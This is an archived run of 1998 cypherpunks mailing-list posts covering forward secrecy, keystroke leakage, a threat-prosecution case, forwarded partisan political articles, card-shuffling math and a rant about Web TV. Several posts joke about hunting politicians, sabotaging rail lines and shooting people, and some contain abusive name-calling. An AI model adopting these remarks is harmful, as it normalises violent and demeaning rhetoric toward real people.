hovering fear of an up-for-reelection AG swooping down. And when
do naughty pictures start showing up in alt.fan.disney? And
what's the AG's move then?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 31 Oct 1998 00:13:41 +0800
To: redrook@yahoo.com
Subject: Re: don't use passwords as private keys (was Re: Using a password as a private key.)
In-Reply-To: <19981029221752.26488.rocketmail@send102.yahoomail.com>
Message-ID: <199810301443.OAA06479@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Harv "RedRook" (is that Harvey Rook?) writes:
> You don't know you have to destroy a key file, until it is too late.

Sooo.  What does this imply you should do?  Destroy your key file on a
regular basis :-)

eg. this key:

pub  2048/2E17753D 1998/10/04 Adam Back <aba@dcs.ex.ac.uk> (FS key, Oct 98)

will be destroyed tomorrow ("FS" = Forward Secrecy), the key is my
forward secret key for October.  And this one was destroyed at the end
of last month:

pub  2048/xxxxxxxx 1998/09/01 Adam Back <aba@dcs.ex.ac.uk> (FS key, Nov 98)

etc.

This means that if someone were (say like GCHQ or ECHELON) were to be
archiving my email, and later develop an interest in reading it, they
would be out of luck.  And I wouldn't be able to help them if I wanted
to.

> Until then, it's just laying around waiting for some one to copy and
> crack. If you are paranoid enough to assume your opponent is going to
> torcher you to get your signature password, you should assume that he
> already has your keyfile, and is willing to torcher you to get it's
> password.

Forward secrecy means that only the current key file is vulnerable.

> Thus coercion and dicitonary attacks are moot points. That is, if your
> password is good enough.

Your passphrase might not be as secure as you think it is.  The sound
of you typing it whilst on the phone, or the RF noise emitted by the
keyboard controller chip may completely or partially leak it.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 31 Oct 1998 04:59:27 +0800
To: cypherpunks@cyberpass.net
Subject: More on Bic-Assassins
In-Reply-To: <199810301955.NAA26318@einstein.ssz.com>
Message-ID: <199810302027.PAA01972@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate:

What's the buzz in TX about the Bic-Assassins?

I spoke to a reporter at the Brownsville Herald who's
been covering the case and she says that local
folks think the men were entrapped by the government
with a sting.

Her story today and others previously at:

   http://www.brownsvilleherald.com

She sent me a copy of the indictment which cites a
confidential "source" which set up the E-mail system 
used to send threats to officials (the fink promised
the messages could not be traced - ouch!). The poor 
saps were videotaped throughout their planning 
and executing the threats, thanks to the informant's 
arrangements:

   http://jya.com/wge072198.htm

The informant is named in the court docket (which shows
that the defendants' attorneys put up a fierce fight
using First Amendment and other defenses discussed
here in regard to CJ):

   http://jya.com/usa-v-wise.htm

The judge's rulings favored the government consistently, 
though.

BTW, the prosecutor says that it made no difference that
nothing was ever done to act on the threats, no Bic-lighter
or bio-weapon was ever made, that it was enough under 
the law for the threat to have been made. "Justice was
done," he said of the conviction.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 31 Oct 1998 06:46:38 +0800
To: cypherpunks@toad.com
Subject: Re: Word choice
In-Reply-To: <199810241607.SAA00878@replay.com>
Message-ID: <v04011705b25fd639503f@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:07 AM -0500 10/24/98, Anonymous wrote:
>>Bee in the bonnet: A few days before CJ's arrest warrant was issued
>>the DoJ put out a study on the "Shared Traits of Potential Assassins:"
>
>>The traits:
>
>    * To achieve notoriety or fame.
>    * To bring attention to a personal or public problem.
>    * To avenge a perceived wrong; to retaliate for a perceived injury.
>    * To end personal pain; to be removed from society; to be killed.
>    * To save the country or the world; to fix a world problem.
>    * To develop a special relationship with the target.
>    * To make money.
>    * To bring about political change.
>
>How does this differ from the motives of your ordinary politician?
>

	Almost no politician (there are way too many i's in that word) is
there "To end personal pain; to be removed from society; to be killed."

>Post-revolution, will there be caliber limitations when hunting them?


--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 31 Oct 1998 00:49:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Airline id
Message-ID: <19981030163553.6307.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



> Naaah, you pull rail-spikes to get trains, no big ba-da-boom required.

Yow!  So buying a crowbar gets you thrown in the can
for conspiracy to possess terrorist weapons of mass destruction!



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Oct 1998 09:46:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Cyber force behind protest
Message-ID: <199810310113.RAA00450@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: E Pluribus Unum <eplurib@infinet.com>
Subject: IP: Cyber force behind protest
Date: Fri, 30 Oct 1998 06:59:50 -0500
To: E Pluribus Unum Email Distribution Network <eplurib@infinet.com>

Cyber force 
                   

                   By Anne Williamson 

                   What is dismaying to Democrats is a cliche to
                   Republicans; no one has done as much for the
                   Republican Party over the past six years as
                   has Bill Clinton. But Bill Clinton has
                   succeeded in making another significant
                   contribution to American political life.
                   Citizenship is back with a vengeance. If you
                   don't believe me, then just check out the
                   hottest site on the Internet, freerepublic.com. 

                   Begun by a handful of concerned citizens who
                   discovered their comments regarding Clinton
                   administration corruption were being
                   censored in an AOL political chat room, the
                   website itself is the achievement of one man,
                   Jim Robinson of Fresno, California. A retired
                   software executive suffering from muscular
                   sclerosis, Robinson marshaled his outrage
                   and his resources to establish the website.
                   With nearly 10,000 posters and over 120,000
                   daily hits, Free Republic has become a
                   phenomenon, a community and -- most
                   recently -- a nascent political force of
                   mindboggling potential. 

                   Dedicated to free speech, constitutional
                   government and the exposure of government
                   corruption, Free Republic works on an
                   interactive basis. The pretext for opening
                   debate is for participants to search the Internet
                   for pertinent news articles and post them
                   under Free Republic's many topics to
                   discussion boards of which "Whitewater" --
                   the catchall Clinton scandal header -- sizzles
                   the loudest. And then -- like a decorative tank
                   of pirhanas tossed a treat by a friendly
                   barkeep -- posters move in to dissect and
                   critique the article. 

                   What emerges by the end of the fast-moving
                   discussion "thread" no longer bears the
                   prejudicial marks of journalists belonging to
                   what FR characterizes as "the lamestream
                   media." Freepers, as Lucianne Goldberg has
                   dubbed them, employ links to other Internet
                   sites for unusual citations, contrary opinions
                   and facts supportive of their various
                   arguments. Original material found wanting
                   is received no differently. Dubious sourcing
                   and fuzzy thinking take a drubbing. In fact,
                   FR's forum is rigorous enough to have helped
                   develop several contributors' writing careers:
                   Lawyer J. Peter Mulhern went from a lengthy
                   call-in encounter with Rush Limbaugh to a
                   column for The Washington Weekly after a
                   stint as an FR regular; and David Burge, the
                   IowaHawk, whose whimsical and hilarious
                   "verbal cartoons" lampooning the political left
                   make him a FR favorite, lasted just long
                   enough to get plucked by the Conservative
                   News Network. Since the posts and
                   accompanying threads are indexed and
                   archived daily, FR's history along with that of
                   the nation is readily available. 

                   Otherwise, tinker, tailor, soldier are all to be
                   found on the Forum -- a cornucopia of
                   experience and knowledge -- who are joined
                   by White House monitors, disenchanted
                   Democrats, San Francisco "soccer moms with
                   brains," discouraged feminists and the
                   occasional liberal iconoclast. New players
                   stumble onto the site usually via a link from
                   Drudge, WorldNetDaily, Town Hall or other
                   news site while still others are tipped to the
                   political cyber-salon by a friend or relative.
                   When "lurkers," who often prowl the website
                   for months, finally emerge in discussion
                   threads, their first comments almost always
                   reflect the same relief, gratitude and simple
                   awe at the human resources assembled
                   common to most posters: "I love Free
                   Republic!"; "I can't believe what I'm seeing, I
                   thought I was the only person in the country
                   concerned about this administration!"; and
                   "Free Republic forever!"; are typical of first
                   posts. 

                   The site's development has been fueled by the
                   Clintons' political thuggery. En masse, freepers
                   form one giant collective detective bent on
                   cracking a devilishly complicated case.
                   Relevant facts are assembled, questions asked
                   and informed speculation engaged in daily,
                   hour by hour. With an alert and articulate
                   investigative team numbering in the
                   thousands, the exercise makes for riveting
                   entertainment. Colorful villains enliven the
                   storyline; there's "Slick," of course, a/k/a
                   "Bent" and "Clintoon," there's "Hitlery" a/k/a
                   "Shrillery" and "Hildebeast," and there's
                   "Whorealdo," "CarVILE," "Sid Bluminsky,"
                   "George Steppinalloverus" and other
                   luminaries from the "Kneepad Democrats"
                   branch of the DNC. 

                   But FR is not just conservative angst and sly
                   mockery. The site was instrumental in the
                   quick exposure of CNN's fraudulent report
                   regarding the alleged use of nerve gas against
                   U.S. deserters during the Vietnam War, in the
                   overturning of Clinton's attempt to negate U.S.
                   federalism with Executive Order 13083
                   (signed when he was in Birmingham,
                   England) and in achieving a moratorium on
                   funding for a national identification card and
                   for re-examining the desirability of a national
                   data bank of all citizens' private medical
                   records. Emboldened by success, it was
                   shortly after the CNN fraud was revealed that
                   Free Republic evolved yet again; organized
                   political protest was undertaken by members
                   of the regional chapters which formed rapidly
                   over the summer. 

                   Ever since Labor Day, Bill Clinton has had
                   nearly every public appearance in the course
                   of his nonstop fundraising dogged by
                   determined freepers waving protest signs and
                   shouting stinging chants ("He's late, he's late,
                   he musta had a date!"). Consequently, Barbara
                   Boxer, Carolyn "Mostly-Fraud" and other
                   endangered Democrats have had to resort to
                   playing hide and seek with freepers. 

                   Some freepers suspect their growing
                   effectiveness tipped the Los Angeles Times
                   and the Washington Post to file suit several
                   weeks ago against Jim Robinson and Free
                   Republic for violation of their property's
                   copyright based on freepers posting entire
                   articles from their respective publications.
                   FR's position is that the postings and
                   discussion threads compare to neighbors
                   mulling over the daily newspapers around a
                   kitchen table and are therefore allowed under
                   the fair use doctrine, which permits the
                   nonprofit use of copyrighted material for
                   purposes of public discussion. 

                   The courts must sort it out but if I were
                   writing the script, I'd pursue Free Republic's
                   defense on the "creation of something new"
                   aspect of the fair use doctrine. The website is
                   unlike any other venue in American life; the
                   newspaper articles alone are just so much
                   fishwrapping for tomorrow's garbage, but the
                   archived material is the unique product of an
                   informed community of engaged citizenry;
                   the very purpose the founders intended free
                   speech to serve. 

                   This week Free Republic is undergoing
                   another evolutionary leap, an unintended
                   consequence of intoxicated Teamsters having
                   roughed up demonstrators earlier this month
                   in Philadelphia. After viewing television
                   footage of the incident, Jim Robinson
                   determined he'd had enough. He would, he
                   posted to the forum, travel to Washington
                   while the weather was still warm enough for a
                   lone man in a wheelchair to spend the day
                   outside the White House holding aloft a
                   protest sign. 

                   Within hours, several hundred people
                   determined that Jim Robinson wouldn't be
                   making that journey alone. Now the
                   protesters number in the thousands and Free
                   Republic's "March for Justice" has been
                   moved on account of its growing size from
                   Lafayette Park to the Ellipse and from there to
                   the Washington Monument. 

                   On Saturday, literally thousands of average
                   Americans -- people who look like your
                   neighbors because they are your neighbors --
                   from across the country, many of whom never
                   gave a thought to political protest before in
                   their lives, will have descended on America's
                   national home in order to participate in a six
                   hour grassroots protest funded out-of-pocket.
                   They will be standing with one man in
                   support of just one idea; the idea of one
                   nation, under God, with liberty and justice for
                   all. Eagles up, America! 

                   Anne Williamson, a WorldNetDaily contributor,
                   has written for the Wall Street Journal, The New
                   York Times, Spy magazine, Film Comment and
                   Premiere. An expert on Soviet-Russian affairs, she
                   is currently working on a book, "Contagion: How
                   America Betrayed Russia," a chapter of which can
                   be read online. 
-- 
******************************************************************
       E Pluribus Unum            The Central Ohio Patriot Group       
       P.O. Box 791          Eventline/Voicemail: (614) 823-8499  
       Grove City, OH  43123                                      

       Meetings:  Monday Evenings, 7:30pm, Ryan's Steakhouse         
       3635 W. Dublin-Granville Rd. (just East of Sawmill Rd.)    
   
http://www.infinet.com/~eplurib          eplurib@infinet.com     
******************************************************************


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Oct 1998 09:44:46 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Internet Allows Lies to Spread Far and Wide
Message-ID: <199810310113.RAA00461@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: Internet Allows Lies to Spread Far and Wide
Date: Fri, 30 Oct 1998 09:04:48 -0500
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

 Internet Allows Lies to Spread Far and Wide
Oct. 30 (Detroit Free Press/KRTBN)--When the telephone was introduced
to the American home, party lines and gossip ruled the day, as two,
three or half a dozen households shared one phone line.

Imagine, though, linking thousands of gossips on a party line. That's
how rumors called urban legends travel the Internet.

In April, the Taubman Co., the Bloomfield Hills shopping center
developer, was on the receiving end of an Internet whopper about a
mysterious stalker at the Mall at Tuttle Crossing in Columbus, Ohio.

The bad-guy-in-the-parking-lot story spread through Columbus, reaching
about 200,000 people.

Within months, the same story, which originated at least a decade
earlier -- no one knows where -- had been applied to malls as far as
San Francisco and Seattle.

Counteracting the fear sparked by such rumors takes a new approach,
and a new breed of consultants such as New York's Middleberg
Interactive On-Line Communications. Taubman turned to Middleberg with a
$10,000 retainer to stem the damage.

Amy Jackson, a consultant with Middleberg, began working on Taubman's
predicament in mid-April and kept on until mid-June.

"When Taubman came to us, the process had begun," Jackson said. "While
they had a superior PR staff, they had no experience in addressing an
Internet hoax."

The Taubman legend had the marks of a classic. "No one can identify
where it's sourced from; it's national," Jackson said. "It's a very
serious problem. There's absolutely no truth to it, but the Internet
spreads information instantly and globally."

Middleberg defines urban legends as false stories with multiple
variations. A story which varies in the telling is also the first red
flag to investigators that it probably isn't true.

Johnny Scales, general manager of the Mall at Tuttle Crossing, said he
read three versions of the story before crafting a response for the
Internet. "In one version it was a security guard, in another it was a
well-dressed man in a dark blue suit, and in the third it was a guy in
a T-shirt," Scales said.

Scales investigated the rumor and consulted with police before going
to the news media to refute it.

This particular urban legend was spread mainly by a network of
business and professional women, its membership ranging from
secretaries to executives. Many received the rumor, then hit a button
and E-mailed the story to friends, relatives and colleagues, without
questioning its origin or validity.

"There was a woman in Columbus who had hundreds of names on her list,"
said Chris Tennyson, Taubman's senior vice president of corporate
affairs.

Defusing the rumors is far more difficult than spreading them, and
laws about passing on urban legends over the Internet are vague.

Larry Dubin, constitutional law professor at the University of Detroit
Mercy School of Law, said liability for making defamatory statements
could extend to the Internet, but it's difficult to prove a rumor's
source. "If someone merely repeats what they've heard as a means of
providing needed information to someone else," they aren't liable,
Dubin said.

"The question is: Does communicating through the Internet, because you
are disseminating information through large numbers of people, create a
duty on the part of the communicator to check sources, like a
journalist would?" Dubin said.

For now, the answer is no. The law figures public people and
institutions have access to the media to defend themselves, says Dawn
Phillips-Hertz, general counsel of the Michigan Press Association.

So businesses dogged by Internet rumors must use means other than the
courts to dispel them.

Taubman discovered what other companies, such as Neiman Marcus, have
discovered -- that the Internet has an almost magical effect on the
psychology of otherwise sensible people.

Neiman Marcus was the subject of a false rumor, about a dozen years
old, but new to the Internet. It said a woman went into Neiman Marcus
and ordered a Mrs. Field's cookie. She asked for the recipe, was given
it and later got a bill for $250. The story was sent all over the
Internet with a cookie recipe.

Neiman Marcus spokeswoman Molly Garr said when Neiman's gets E-mail on
the cookie incident, it sends customers an explanatory letter, and
includes the recipe.

Jerry Herron, director of the American Studies program at Wayne State
University, said stories like the shopping center stalker tale give
people a reason to avoid malls -- especially if they feel uncomfortable
there.

"The very qualities that first made malls desirable -- open spaces,
consistent temperatures and lighting -- now make them spooky," Herron
said.

"You feel creeped out at the mall, and you think, 'What's wrong with
me?' You listen to the story and you think, 'There's nothing wrong with
me at all. It's the mall, not me,' " Herron said.

By Molly Brauer

-0-
 Visit the four World Wide Web sites of the Detroit Free Press. Visit
Auto Authority at http://www.auto.com, the Freep at
http://www.freep.com, Jobspage at http://www.freep.com/jobspage and
Yaks Corner for kids at http://www.yakscorner.com

(c) 1998, Detroit Free Press. Distributed by Knight Ridder/Tribune
Business News.  TCO, NMG,  END!A19?DE-INTERNET


News provided by COMTEX.
[!ENVIRONMENT] [!WALL+STREET] [BUSINESS] [CORPORATE] [E-MAIL] [INTERNET]
[KRT] [MEDIA] [MICHIGAN] [NEW+YORK] [NEWS] [NEWSGRID] [OHIO] [POLICE]
[TRAVEL] [USA] [WOMEN]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Oct 1998 09:43:29 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Thousands to Demand Removal of Clinton at 'March for Justice' -Oct 31
Message-ID: <199810310113.RAA00492@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Thousands to Demand Removal of Clinton at 'March for Justice' -Oct 31
Date: Fri, 30 Oct 1998 10:43:26 -0600
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/1029-136.txt

Thousands to Attend 'March for Justice' Rally Oct. 31  
U.S. Newswire
29 Oct 19:56

 Thousands to Demand Removal of Clinton from Office at Oct. 31 'March for
Justice' Rally
 To: Assignment Desk, Daybook Editor
 Contact: Connie Hair or Carla Michele,
          202-965-2700 (Oct. 29-Nov. 1),
          or 202-256-5042 (on-site cellular)

   News Advisory:

   People from across the United States will travel to Washington,
D. C., to exercise their Constitutional right of assembly to
petition their elected representatives to remove President Clinton
from office at a massive rally being held this Saturday, Oct.
31 on the Washington Mall.

   The event, which is being organized by Web site
www.FreeRepublic.com, will bring together citizens -- both Democrats
and Republicans -- from all walks of life who are concerned about the
corruption of the Office of the Presidency by Bill Clinton.

   Speakers for the event include both people who have been thrust
into the limelight by the White House scandals as well as a number of
prominent national leaders. Heading the line-up will be Ambassador
Alan Keyes and Rep. Bob Barr (R-Ga.).

   What: "March for Justice" rally on Washington Monument
   When: Saturday, Oct. 31, noon-6 p.m.
   Where: The Washington Monument
   Who:
   -- Ambassador Alan Keyes
   -- Rep. Bob Barr
   -- Jim Robinson, founder, www.FreeRepublic.com
   -- Larry Klayman
   -- Gary Aldrich
   -- Lucianne Goldberg
   -- Former Rep. Ben Jones
   -- Dr. Paul Fick
   -- Rev. Jesse Peterson
   -- LD Brown
   -- Thousands of concerned Americans from all walks of life.

 -0-
 /U.S. Newswire  202-347-2770/
 10/29 19:56

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 01:29:26 +0800
To: cypherpunks@toad.com
Subject: Re: 4 Horseman not so bad..
Message-ID: <199810301647.RAA06172@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 05:06 PM 10/29/98 -0500, Chip Mefford wrote:
>On Thu, 29 Oct 1998, Anonymous wrote:
>> At 07:52 AM 10/29/98 -0500, Chip Mefford wrote:
>> >>  but some peope are scared of
>> >> drugs/paedophiles/terrorists etc, so thats the way in for the
jackboots. 
>> >> To oppose it we need to reduce fear. 

>> Right.  The new Happy Net campaign.

>Well, 
>
>Sorry, I don't mean to sound pollyanneish, thats not my point.
>Its just a point of view I had never heard expressed before, and
>I thought it was interesting. 
>
>Fighting fear with more fear isn't working. 
>Its just that simple, a different approach 
>I think is worthy of investigation. 
>

Your observation is in fact correct.  The fear must be
shown to be *exaggerated* for the benefit of the fearmongers.
The intrusion must be shown to be not just intruding on "them"
but on "us".  (Europe's recent interest in Echelon may be an example
of the latter.)

Sheeple will *eventually* learn (again) that nasty people
will always do nasty things with the technology du
jour, and mostly the police just mop up afterwards.
(If it isn't the State doing the nasty things in the
first place.)  Of course, we might have an intervening dark ages
for a millenia or two, but in the long run, you get a clue or 
go extinct.

You don't ban something as basic as metal or
encryption because some people do bad things with it.
And you don't depend on laws to secure privacy.

In the meantime, morons whine for State control 
of metal, while barbarians are destroying the town's 
wooden walls with metal rams, and protective metal walls aren't being
deployed because the townies fear that the bad townies will abuse metal.







"Freedom of choice is what you have, freedom from choice is what you want"
-Devo

"Those that would trade liberty for security should be shot"
-Kite Sparko








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 03:17:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: FCC Proposes Location Tracking for Wireless Phones
Message-ID: <199810301700.SAA07910@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 01:03 AM 10/30/98 -0800, Vladimir Z. Nuri wrote:
>(2)  PUBLIC COMMENT SOUGHT - A CHANCE TO TELL THE FCC THAT CELL PHONE
>TRACKING IS NOT ACCEPTABLE!
>

>CDT has established a special "Action" page to make it easy for citizens to
>contact the FCC and file comments opposing the location tracking proposal:
>http://www.cdt.org/action/filing.html


Be sure to mention ECHELON to get it into the US public eye.










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 31 Oct 1998 12:39:52 +0800
To: Adam Back <redrook@yahoo.com
Subject: Re: don't use passwords as private keys (was Re: Using a password as a private key.)
In-Reply-To: <19981029221752.26488.rocketmail@send102.yahoomail.com>
Message-ID: <3.0.5.32.19981030182933.008baae0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain




>Harv "RedRook" (is that Harvey Rook?) writes:
>> You don't know you have to destroy a key file, until it is too late.

At 02:43 PM 10/30/98 GMT, Adam Back wrote:
>Sooo.  What does this imply you should do?  
>Destroy your key file on a regular basis :-)
...
>This means that if someone were (say like GCHQ or ECHELON) were to be
>archiving my email, and later develop an interest in reading it, they
>would be out of luck.  And I wouldn't be able to help them if I wanted to. ...
>Forward secrecy means that only the current key file is vulnerable.

Forward secrecy for encryption keys is a really important technique;
as you say, nobody can go back later and force you to reveal the key.
Forward secrecy for signature keys is less useful (:-), since it means
that you can't later sign a document using an old key.  (Occasionally
this may be bad - e.g. court cases demonstrating you signed something -
but it also means nobody can forge an old signature of yours.)

In any Forward Secrecy environment, it tends to help to have multiple keys,
with a long-term key that's only used for signing short-term keys.
The classic example is Authenticated Diffie-Hellman key exchange,
with one-use session keyparts signed by your signature key
(ideally with the signatures passed inside the encrypted session
rather than beforehand in the clear.)  

One difficulty is proving that you don't have a backup copy of the keyfile,
on tapes, or hidden, or printed on paper stuck in a desk drawer.
Proving that _you_ didn't make a copy is usually impossible,
and knowing whether somebody else has a copy of things is a problem
Ollie North has dealt with (:-) ; if you're running your own PC,
physically secure, then you're at least as secure as your network connections.

Another issue for Kong and other systems with keys made from a
passphrase and keyfile is whether to reuse either of them
in a forward secrecy environment.  It's sometimes convenient
to use the same passphrase and change keyfiles every cycle,
but that depends on your threat models.

>Your passphrase might not be as secure as you think it is. 
>The sound of you typing it whilst on the phone, or the RF noise 
>emitted by the keyboard controller chip may completely or partially leak it.

If you're worried about RF noise, you have to assume the CPU or disk
is also radiating enough for the spooks.  On the other hand,
that video camera in the ceiling can watch your keystrokes,
but can't watch the CPU.  That's when the paranoids worry about
whether the KGB is sneaking in and copying their disk drive at night,
and they start getting encrypted file system software. :-)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 31 Oct 1998 03:18:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Shuffling (fwd)
In-Reply-To: <199810291716.LAA19879@einstein.ssz.com>
Message-ID: <71d1ik$b4o$1@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <199810291716.LAA19879@einstein.ssz.com>,
Jim Choate  <ravage@einstein.ssz.com> wrote:
>Forwarded message:
>
>> From: iang@cs.berkeley.edu (Ian Goldberg)
>> Subject: Re: Shuffling (fwd)
>> Date: 29 Oct 1998 16:16:41 GMT
>
>> The "7 times" theorem uses the following model of a shuffle:
>> 
>> o The deck is cut into two parts, with the number of cards in each piece
>>     binomially distributed (with mean 26, of course).
>
>> o The resulting deck is then achieved by having cards fall from one or the
>>     other of the two parts; a card will fall from one of the parts with
>>     probability proportional to the number of cards remaining in the part.
>
>The only problem I see with this model, re real card decks, is that the
>probability for a given card to fall to the top of the shuffled pile isn't
>related in any way to the number of cards in either stack in a real-world
>shuffle.

Yup.

   "It's only a model."  -- Monty Python and the Holy Grail

>It also doesn't address the problem of 'clumping' where a group of cards (ie
>royal flush) stay together through the shuffling. This is the reason that
>real dealers try for a 1-for-1 shuffle each time.

It actually _does_ address the normal, statistical clumping that goes on.
It _doesn't_ address clumping that occurs because, say, you were playing
poker while eating a peanut butter sandwich. :-)

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Oct 1998 11:29:33 +0800
To: cypherpunks@cyberpass.net
Subject: network computers, web TV, java
Message-ID: <199810310301.TAA02632@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



recently it was announced that Web TV, owned by mostly by MS,
 will not come out with a java version of their computer.
even after talking about this as early as '97..

this is really BOGUS in my opinion. recently I posted
how similar a Web TV is to a network computer. if you had
java in it, I would say that IS a network computer. 
MS is trying to destroy the network computer market by
this decision. the president of web TV denies MS has had
anything to do with it. B*******!!! @#%^&*

they say that it would "cost too much" to add java to
their machine, and that they are "stretched thin". c'mon
you idiots, you're a multimillion dollar company, and why
don't you JUST COME OUT WITH ANOTHER JAVA MODEL that costs
a bit more?!?!? what do you think we are, STUPID?!?!
oh yeah, and how long would it take now that there are
debugged Java Chips available???

I know what you're doing....

well you WON'T GET AWAY WITH IT-- mark my words, you
@#%^&* gatesasskissers!!!!!

gates REALLY IS AN EVIL, PETTY MAN
it's just that he's managed to hide it from the world

there's an old saying.. "I'm not trying to get EVERYTHING..
only YOUR HALF" .. but gates, your days are numbered!!! <g>



see the article at
http://www.news.com/News/Item/0,4,28136,00.html?st.ne.fd.gif.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 31 Oct 1998 04:56:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Shuffling (fwd)
In-Reply-To: <199810301934.NAA26157@einstein.ssz.com>
Message-ID: <71d757$bub$1@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <199810301934.NAA26157@einstein.ssz.com>,
Jim Choate  <ravage@EINSTEIN.ssz.com> wrote:
>Forwarded message:
>
>> From: iang@cs.berkeley.edu (Ian Goldberg)
>> Subject: Re: Shuffling (fwd)
>> Date: 30 Oct 1998 18:46:44 GMT
>
>> >> o The resulting deck is then achieved by having cards fall from one or the
>> >>     other of the two parts; a card will fall from one of the parts with
>> >>     probability proportional to the number of cards remaining in the part.
>
>> >It also doesn't address the problem of 'clumping' where a group of cards (ie
>> >royal flush) stay together through the shuffling. This is the reason that
>> >real dealers try for a 1-for-1 shuffle each time.
>> 
>> It actually _does_ address the normal, statistical clumping that goes on.
>> It _doesn't_ address clumping that occurs because, say, you were playing
>> poker while eating a peanut butter sandwich. :-)
>
>What I was refering to was that let's say we've just finished playing a hand
>of cards and the next dealer collects them from each player and stacks them
>up prior to shuffling. Since the selection of cards is related to the
>thickness of the two half-decks (and not a strict 1-to-1) it is reasonable
>to expect an above average number of such shuffles (ones with grossly uneven
>card counts, exactly what that would be I don't know), now as a player I'm
>going to know about this bias and can use it to my advantage. I admit it
>probably won't change the odds much but sometimes a few hundreths over a
>long time can make a difference.

That's true.  That's why you need to do it seven times, in order to
properly randomize the deck.

It's for exactly this reason that players at computer-dealt bridge
tournaments complain about "flat" distributions.  When they play in
"real life", people usually don't shuffle seven times, and the resulting
suit distributions end up skewed ("ghoulies" is the extreme case of this).
The players are used to this, though, and when they get actual random
hands, the distributions are much flatter.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "blancink" <blancink@cnw.com>
Date: Sat, 31 Oct 1998 12:52:01 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: network computers, web TV, java
Message-ID: <001c01be0487$d9185860$218195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vlad ze Nurdi, who knows knows *Everything*:

>I know what you're doing....
>
>well you WON'T GET AWAY WITH IT-- mark my words, you
>@#%^&* gatesasskissers!!!!!
>
>gates REALLY IS AN EVIL, PETTY MAN
